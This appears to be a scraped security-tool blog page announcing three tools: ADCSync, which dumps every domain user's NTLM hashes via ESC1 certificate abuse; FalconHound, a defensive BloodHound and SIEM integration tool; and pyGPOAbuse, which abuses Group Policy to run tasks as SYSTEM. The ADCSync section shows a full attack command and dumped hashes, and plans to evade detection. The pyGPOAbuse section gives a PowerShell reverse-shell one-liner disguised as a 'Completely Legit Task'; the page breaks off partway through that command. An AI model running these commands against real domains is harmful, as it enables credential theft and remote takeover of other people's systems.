</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-33797241161437681462024-02-18T15:51:00.000-08:002024-02-18T15:51:12.125-08:00ADCSync - Use ESC1 To Perform A Makeshift DCSync And Dump Hashes<article><div class="post-body entry-content" id="post-body-1232537971106150805" itemprop="articleBody"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9oNOzs5SQLzMkqV4A6SLCl-CitTuQChVQVcCRUpKYwFMrbnc6xdH3opP29Hpo5kUAlbYl7mikD8ArS9A4KugHnfzR0AcDR5AOcEIrVP0PY5bTykTkU4KEL8q6cQutnLpVsCuTKSjk4mF1a-xBsgODDqwH3ZxtQbm5xNwvaVuOj-bd5mEIC0SCJDvOcA8/s1792/ADCSsync.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9oNOzs5SQLzMkqV4A6SLCl-CitTuQChVQVcCRUpKYwFMrbnc6xdH3opP29Hpo5kUAlbYl7mikD8ArS9A4KugHnfzR0AcDR5AOcEIrVP0PY5bTykTkU4KEL8q6cQutnLpVsCuTKSjk4mF1a-xBsgODDqwH3ZxtQbm5xNwvaVuOj-bd5mEIC0SCJDvOcA8/w640-h366/ADCSsync.png" width="640" /></a></div><p><br /></p> <p dir="auto">This is a tool I whipped up together quickly to DCSync utilizing ESC1. It is quite slow but otherwise an effective means of performing a makeshift DCSync attack without utilizing <a href="https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync" rel="nofollow" target="_blank" title="DRSUAPI">DRSUAPI</a> or <a href="https://book.hacktricks.xyz/windows-hardening/stealing-credentials#volume-shadow-copy" rel="nofollow" target="_blank" title="Volume Shadow Copy">Volume Shadow Copy</a>.</p><span><a name="more"></a></span><p dir="auto"><br /></p> <p dir="auto">This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.</p> <div><pre><code>python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt<br /><br /> ___ ____ ___________<br /> / | / __ \/ ____/ ___/__ ______ _____<br /> / /| | / / / / / \__ \/ / / / __ \/ ___/<br /> / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__<br />/_/ |_/_____/\____//____/\__, /_/ /_/\___/<br /> /____/<br /><br />Grabbing user certs:<br />100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]<br />THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::<br />THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::<br />THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::<br />THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::<br />THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::<br />THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::<br />THEGRID.LO CAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::<br />THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::<br />THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Introduction</h2> <p dir="auto">ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.</p> <h2 dir="auto" tabindex="-1">Installation</h2> <div><pre><code>git clone https://github.com/JPG0mez/adcsync.git<br />cd adcsync<br />pip3 install -r requirements.txt<br /></code></pre></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">To use this tool we need the following things:</p> <ol dir="auto"> <li>Valid Domain Credentials</li> <li>A user list from a bloodhound dump that will be passed in.</li> <li>A template vulnerable to ESC1 (Found with Certipy find)</li> </ol> <div><pre><code># python3 adcsync.py --help<br /> ___ ____ ___________ <br /> / | / __ \/ ____/ ___/__ ______ _____<br /> / /| | / / / / / \__ \/ / / / __ \/ ___/<br /> / ___ |/ /_/ / /___ ___/ / /_/ / / / / /__ <br />/_/ |_/_____/\____//____/\__, /_/ /_/\___/ <br /> /____/ <br /><br />Usage: adcsync.py [OPTIONS]<br /><br />Options:<br /> -f, --file TEXT Input User List JSON file from Bloodhound [required]<br /> -o, --output TEXT NTLM Hash Output file [required]<br /> -ca TEXT Certificate Authority [required]<br /> -dc-ip TEXT IP Address of Domain Controller [required]<br /> -u, --user TEXT Username [required]<br /> -p, --password TEXT Password [required]<br /> -template TEXT Template Name vulnerable to ESC1 [required]<br /> -target-ip TEXT IP Address of th e target machine [required]<br /> --help Show this message and exit.<br /><br /></code></pre></div> <h2 dir="auto" tabindex="-1">TODO</h2> <ul dir="auto"> <li>Support alternative authentication methods such as NTLM hashes and ccache files</li> <li>Automatically run "certipy find" to find and grab templates vulnerable to ESC1</li> <li>Add jitter and sleep options to avoid detection</li> <li>Add type validation for all variables</li> </ul> <h2 dir="auto" tabindex="-1">Acknowledgements</h2> <ul dir="auto"> <li><a href="https://github.com/puzzlepeaches" rel="nofollow" target="_blank" title="puzzlepeaches">puzzlepeaches</a>: Telling me to hurry up and write this</li> <li><a href="https://github.com/ly4k/Certipy" rel="nofollow" target="_blank" title="ly4k">ly4k</a>: For Certipy</li> <li><a href="https://github.com/WazeHell/vulnerable-AD" rel="nofollow" target="_blank" title="WazeHell">WazeHell</a>: For the script to set up the vulnerable AD environment used for testing</li> </ul> <br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/JPG0mez/ADCSync" rel="nofollow" target="_blank" title="Download ADCSync">Download ADCSync</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer">
</div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-49560965966620194522024-02-18T15:48:00.000-08:002024-02-18T15:48:53.765-08:00FalconHound - A Blue Team Multi-Tool. It Allows You To Utilize And Enhance The Power Of BloodHound In A More Automated Fashion<article><div class="post-body entry-content" id="post-body-2815585869362877527" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEg1TWTLu2beK5GvgcXGq2HKj_lK1QDSJfmuHU53-6joWc9AJRBpuYKV48KU7oYxF5klFR9HfGBdTdz03YsGJWp-F8oC7CnubvZR9VXbYMURQjxeKO6Kb0auxvNY5AABHm_WdNo4eFePHgGscRqnlkHikG5G_-3eqeRRGMiZDveGOl8rQ3D2oQmliNft_rE6"><img alt="" border="0" height="400" id="BLOGGER_PHOTO_ID_7310067022199289682" src="https://blogger.googleusercontent.com/img/a/AVvXsEg1TWTLu2beK5GvgcXGq2HKj_lK1QDSJfmuHU53-6joWc9AJRBpuYKV48KU7oYxF5klFR9HfGBdTdz03YsGJWp-F8oC7CnubvZR9VXbYMURQjxeKO6Kb0auxvNY5AABHm_WdNo4eFePHgGscRqnlkHikG5G_-3eqeRRGMiZDveGOl8rQ3D2oQmliNft_rE6=w400-h400" width="400" /></a></p><p style="text-align: center;"><br /></p> <p dir="auto">FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.</p> <p dir="auto">One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.</p> <p dir="auto">One of the hardest releationships to gather for BloodHound is the local group memberships and the session information. As blue teamers we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.</p> <p dir="auto">This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.</p> <p dir="auto">Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.</p> <p dir="auto">Other examples where FalconHound can be used:</p> <ul dir="auto"> <li>Adding, removing or timing out sessions in the graph, based on logon and logoff events.</li> <li>Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.</li> <li>Adding CVE information and whether there is a public exploit available to the graph.</li> <li>All kinds of Azure activities.</li> <li>Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.</li> <li>Adding new users, groups and computers to the graph.</li> <li>Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.</li> </ul> <p dir="auto">The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.</p> <p dir="auto">A blog detailing more on why we developed it and some use case examples can be found <a href="https://medium.com/falconforce/falconhound-attack-path-management-for-blue-teams-42adedc9cae5?source=friends_link&sk=9f64b6b3028c5a2a6087d63b4fd2c82f" rel="nofollow" target="_blank" title="here">here</a></p> <p dir="auto">Index:</p> <ul dir="auto"> <li><a href="https://github.com/FalconForceTeam/FalconHound#supported-data-sources-and-targets" rel="nofollow" target="_blank" title="Supported data sources and targets">Supported data sources and targets</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#installation" rel="nofollow" target="_blank" title="Installation">Installation</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#usage" rel="nofollow" target="_blank" title="Usage">Usage</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#actions" rel="nofollow" target="_blank" title="Actions">Actions</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#extensions-to-the-graph" rel="nofollow" target="_blank" title="Extensions to the graph">Extensions to the graph</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#credential-management" rel="nofollow" target="_blank" title="Credential Management">Credential Management</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#deployment" rel="nofollow" target="_blank" title="Deployment">Deployment</a></li> <li><a href="https://github.com/FalconForceTeam/FalconHound#license" rel="nofollow" target="_blank" title="License">License</a></li> </ul> <h2 dir="auto" tabindex="-1">Supported data sources and targets</h2> <p dir="auto">FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.</p> <p dir="auto">Currently, FalconHound supports the following data sources and or targets:</p> <ul dir="auto"> <li>Azure Sentinel</li> <li>Azure Sentinel Watchlists</li> <li>Splunk</li> <li>Microsoft Defender for Endpoint</li> <li>Neo4j</li> <li>MS Graph API (early stage)</li> <li>CSV files</li> </ul> <p dir="auto">Additional data sources and targets are planned for the future.</p> <p dir="auto">At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.</p> <hr /> <h2 dir="auto" tabindex="-1">Installation</h2> <p dir="auto">Since FalconHound is written in Go, there is no installation required. Just download the binary from the release section and run it. There are compiled binaries available for Windows, Linux and MacOS. You can find them in the <a href="https://github.com/FalconForceTeam/FalconHound/releases" rel="nofollow" target="_blank" title="releases">releases</a> section.</p> <p dir="auto">Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to creat all crededentials can be found <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="here">here</a>.</p> <p dir="auto">The recommened way to run FalconHound is to run it as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.</p> <h3 dir="auto" tabindex="-1">Requirements</h3> <ul dir="auto"> <li>BloodHound, or at least the Neo4j database for now.</li> <li>A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.</li> <li>Credentials for each endpoint you want to talk to, with the <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="required permissions">required permissions</a>.</li> </ul> <h3 dir="auto" tabindex="-1">Configuration</h3> <p dir="auto">FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.</p> <hr /> <h2 dir="auto" tabindex="-1">Usage</h2> <h4 dir="auto" tabindex="-1">Default run</h4> <p dir="auto">To run FalconHound, just run the binary and add the <code>-go</code> parameter to have it run all queries in the actions folder.</p> <div><pre><code>./falconhound -go</code></pre></div> <h4 dir="auto" tabindex="-1">List all enabled actions</h4> <p dir="auto">To list all enabled actions, use the <code>-actionlist</code> parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the <code>-go</code> parameter.</p> <div><pre><code>./falconhound -actionlist -go</code></pre></div> <h3 dir="auto" tabindex="-1">Run with a select set of actions</h3> <p dir="auto">To run a select set of actions, use the <code>-ids</code> parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the <code>-go</code> parameter.</p> <div><pre><code>./falconhound -ids action1,action2,action3 -go</code></pre></div> <h4 dir="auto" tabindex="-1">Run with a different config file</h4> <p dir="auto">By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the <code>-config</code> flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.</p> <div><pre><code>./falconhound -go -config /path/to/config.yml</code></pre></div> <h4 dir="auto" tabindex="-1">Run with a different actions folder</h4> <p dir="auto">By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the <code>-actions-dir</code> flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.</p> <div><pre><code>./falconhound -go -actions-dir /path/to/actions</code></pre></div> <h4 dir="auto" tabindex="-1">Run with credentials from a keyvault</h4> <p dir="auto">By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the <code>-keyvault</code> flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.</p> <div><pre><code>./falconhound -go -keyvault</code></pre></div> <hr /> <h2 dir="auto" tabindex="-1">Actions</h2> <p dir="auto">Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.</p> <h3 dir="auto" tabindex="-1">Action folder structure</h3> <p dir="auto">The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.</p> <p dir="auto">The Neo4j actions <strong>should</strong> be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.</p> <h3 dir="auto" tabindex="-1">Action files</h3> <p dir="auto">All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.</p> <p dir="auto">There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.</p> <p dir="auto">While most items will be fairly self explanatory,there are some important things to note about actions:</p> <h4 dir="auto" tabindex="-1">Enabled</h4> <p dir="auto">As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.</p> <div><pre><code>Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Debug</h4> <p dir="auto">This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.</p> <div><pre><code>Debug: false</code></pre></div> <h4 dir="auto" tabindex="-1">Query</h4> <p dir="auto">The <code>Query</code> field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your <code>SourcePlatform</code>. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.</p> <p dir="auto">Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:</p> <div><pre><code>MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) <br /> RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}</code></pre></div> <h4 dir="auto" tabindex="-1">Targets</h4> <p dir="auto">Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the <code>Name</code> and <code>Enabled</code> fields. The <code>Name</code> field is used to identify the target. The <code>Enabled</code> field is used to enable or disable the target. If this is set to false, the target will be ignored.</p> <h4 dir="auto" tabindex="-1">CSV</h4> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: CSV Enabled: true Path: path/to/filename.csv" dir="auto"><pre><code> - Name: CSV<br /> Enabled: true<br /> Path: path/to/filename.csv</code></pre></div> <h4 dir="auto" tabindex="-1">Neo4j</h4> <p dir="auto">The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The <code>ReplacementFields</code> fields are configured below.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Neo4j Enabled: true Query: | MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound' Parameters: Computer: Computer TargetUserSid: TargetUserSid Timestamp: Timestamp" dir="auto"><pre><code> - Name: Neo4j<br /> Enabled: true<br /> Query: |<br /> MATCH (x:Computer {name:$Computer}) MATCH (y:User {objectid:$TargetUserSid}) MERGE (x)-[r:HasSession]->(y) SET r.since=$Timestamp SET r.source='falconhound'<br /> Parameters:<br /> Computer: Computer<br /> TargetUserSid: TargetUserSid<br /> Timestamp: Timestamp</code></pre></div> <p dir="auto">The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the <code>$parameter_name</code> syntax.</p> <h4 dir="auto" tabindex="-1">Sentinel</h4> <p dir="auto">The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <p dir="auto">This is why also query output needs to be controlled, you might otherwise flood your target.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Sentinel Enabled: true" dir="auto"><pre><code> - Name: Sentinel<br /> Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Sentinel Watchlists</h4> <p dir="auto">The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Watchlist Enabled: true WatchlistName: FH_MDE_Exploitable_Machines DisplayName: MDE Exploitable Machines SearchKey: DeviceName Overwrite: true" dir="auto"><pre><code> - Name: Watchlist<br /> Enabled: true<br /> WatchlistName: FH_MDE_Exploitable_Machines<br /> DisplayName: MDE Exploitable Machines<br /> SearchKey: DeviceName<br /> Overwrite: true</code></pre></div> <p dir="auto">The <code>WatchlistName</code> field is the name of the watchlist. The <code>DisplayName</code> field is the display name of the watchlist.</p> <p dir="auto">The <code>SearchKey</code> field is the column that will be used as the search key.</p> <p dir="auto">The <code>Overwrite</code> field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.</p> <h4 dir="auto" tabindex="-1">Splunk</h4> <p dir="auto">Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: Splunk Enabled: true" dir="auto"><pre><code> - Name: Splunk<br /> Enabled: true</code></pre></div> <h4 dir="auto" tabindex="-1">Azure Data Explorer</h4> <p dir="auto">Like Sentinel, Splunk will write the results of the query to a ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.</p> <div class="highlight highlight-source-yaml notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content=" - Name: ADX Enabled: true Table: "name"" dir="auto"><pre><code> - Name: ADX<br /> Enabled: true<br /> Table: "name"</code></pre></div> <h3 dir="auto" tabindex="-1">Extensions to the graph</h3> <h4 dir="auto" tabindex="-1">Relationship: HadSession</h4> <p dir="auto">Once a session has ended, it had to be removed from the graph, but this felt like a waste of information. So instead of removing the session,it will be added as a relationship between the computer and the user. The relationship will be called <code>HadSession</code>. The relationship will have the following properties:</p> <div class="highlight highlight-source-json notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="{ "till": "2021-08-31T14:00:00Z", "source": "falconhound", "reason": "logoff", }" dir="auto"><pre><code>{<br /> "till": "2021-08-31T14:00:00Z",<br /> "source": "falconhound",<br /> "reason": "logoff",<br />}</code></pre></div> <p dir="auto">This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.</p> <h4 dir="auto" tabindex="-1">Properties</h4> <p dir="auto">FalconHound will add the following properties to nodes in the graph:</p> <p dir="auto">Computer: - 'exploitable': true/false - 'exploits': list of CVEs - 'exposed': true/false - 'ports': list of ports accessible from the internet - 'alertids': list of alert ids</p> <h2 dir="auto" tabindex="-1">Credential management</h2> <p dir="auto">The currently supported ways of providing FalconHound with credentials are:</p> <ul dir="auto"> <li>Via the config.yml file on disk.</li> <li>Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.</li> <li>Mixed mode.</li> </ul> <h4 dir="auto" tabindex="-1">Config.yml</h4> <p dir="auto">The config file holds all details required by each platform. All items in the config file are <strong>case-sensitive</strong>. Best practise is to separate the apps on a per service level but you <em>can</em> use 1 AppID/AppSecret for all Azure based actions.</p> <p dir="auto">The required permissions for your AppID/AppSecret are listed <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/docs/required_permissions.md" rel="nofollow" target="_blank" title="here">here</a>.</p> <h4 dir="auto" tabindex="-1">Keyvault</h4> <p dir="auto">A more secure way of storing the credentials would be to use an Azure KeyVault. Be aware that there is a small <a href="https://azure.microsoft.com/en-us/pricing/details/key-vault/" rel="nofollow" target="_blank" title="cost aspect">cost aspect</a> to using Keyvaults. Access to KeyVaults currently only supports authentication based on a AppID/AppSecret which needs to be configured in the config.yml file.</p> <p dir="auto">The recommended way to set this up is to use a ServicePrincipal that only has the <code>Key Vault Secrets User</code> role to this Keyvault. This role only allows access to the secrets, not even list them. Do <em>NOT</em> reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the use of a Keyvault.</p> <p dir="auto">The items to configure in the Keyvault are listed below. Please note Keyvault secrets are <strong>not</strong> case-sensitive.</p> <div><pre><code>SentinelAppSecret<br />SentinelAppID<br />SentinelTenantID<br />SentinelTargetTable<br />SentinelResourceGroup<br />SentinelSharedKey<br />SentinelSubscriptionID<br />SentinelWorkspaceID<br />SentinelWorkspaceName<br />MDETenantID<br />MDEAppID<br />MDEAppSecret<br />Neo4jUri<br />Neo4jUsername<br />Neo4jPassword<br />GraphTenantID<br />GraphAppID<br />GraphAppSecret<br />AdxTenantID<br />AdxAppID<br />AdxAppSecret<br />AdxClusterURL<br />AdxDatabase<br />SplunkUrl<br />SplunkApiToken<br />SplunkIndex<br />SplunkApiPort<br />SplunkHecToken<br />SplunkHecPort<br />BHUrl<br />BHTokenID<br />BHTokenKey<br />LogScaleUrl<br />LogScaleToken<br />LogScaleRepository<br /></code></pre></div> <p dir="auto">Once configured you can add the <code>-keyvault</code> parameter while starting FalconHound.</p> <h4 dir="auto" tabindex="-1">Mixed mode / fallback</h4> <p dir="auto">When the <code>-keyvault</code> parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the <code>config.yml</code>. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.</p> <h2 dir="auto" tabindex="-1">Deployment</h2> <p dir="auto">FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.</p> <p dir="auto">All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.</p> <p dir="auto">Also there might be some overlap with for instance the session actions. If you have a lot of sessions you might want to disable the session actions for Sentinel and rely on the one from MDE. This is assuming you have MDE and Sentinel connected and most machines are onboarded into MDE.</p> <h3 dir="auto" tabindex="-1">Sharphound / Azurehound</h3> <p dir="auto">While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to compliment the collection and remove the moment-in-time problem of the peroiodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.</p> <p dir="auto">It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.</p> <h2 dir="auto" tabindex="-1">License</h2> <p dir="auto">This project is licensed under the BSD3 License - see the <a href="https://github.com/FalconForceTeam/FalconHound/blob/main/LICENSE" rel="nofollow" target="_blank" title="LICENSE">LICENSE</a> file for details.</p> <p dir="auto">This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.</p><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/FalconForceTeam/FalconHound" rel="nofollow" target="_blank" title="Download FalconHound">Download FalconHound</a></span></b></div></div></article>
<div style="clear: both;"></div>
<div class="post-footer"></div>OffensiveSechttp://www.blogger.com/profile/12324833783082823870noreply@blogger.com0tag:blogger.com,1999:blog-2588088702885294836.post-24285818649619463762024-02-18T15:46:00.000-08:002024-02-18T15:46:21.178-08:00pyGPOAbuse - Partial Python Implementation Of SharpGPOAbuse<article><div class="post-body entry-content" id="post-body-3003964975585028415" itemprop="articleBody"><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f"><img alt="" border="0" height="272" id="BLOGGER_PHOTO_ID_7310066697453060050" src="https://blogger.googleusercontent.com/img/a/AVvXsEiIsxrP6JFy-eHuQ2NmbSK9M3bnxQI6dMOcrZoH2_L4K2iDNMOgg_SYHlUyI3lWB6s92BcqgvSP39sLIOGnTgwzFg1UgFj3M0O9br2z3so_P4KngmioQEURu-nArypXCxa55VOQ--_XR90mrko2FSBnxaQJKfCcS7xHxVgxFgV15GoYdoiqbzaHJ_Ro2r0f=w640-h272" width="640" /></a></p><p><br /></p> <p dir="auto">Python <strong>partial</strong> implementation of <a href="https://github.com/FSecureLABS/SharpGPOAbuse" rel="nofollow" target="_blank" title="SharpGPOAbuse">SharpGPOAbuse</a> by<a href="https://twitter.com/pkb1s" rel="nofollow" target="_blank" title="@pkb1s">@pkb1s</a></p> <p dir="auto">This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an <strong>immediate scheduled task</strong> as <strong>SYSTEM</strong> on the remote computer for computer GPO, or as logged in user for user GPO.</p> <p dir="auto">Default behavior adds a local administrator.</p> <h2 dir="auto" tabindex="-1">How to use</h2> <h3 dir="auto" tabindex="-1">Basic usage</h3> <p dir="auto">Add <strong>john</strong> user to local administrators group (Password: <strong>H4x00r123..</strong>)</p> <div><pre><code>./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"</code></pre></div> <h3 dir="auto" tabindex="-1">Advanced usage</h3> <p dir="auto">Reverse shell example</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ -powershell \ -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ -taskname "Completely Legit Task" \ -description "Dis is legit, pliz no delete" \ -user" dir="auto"><pre><code>./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ <br /> -powershell \ <br /> -command "\$client = New-Object 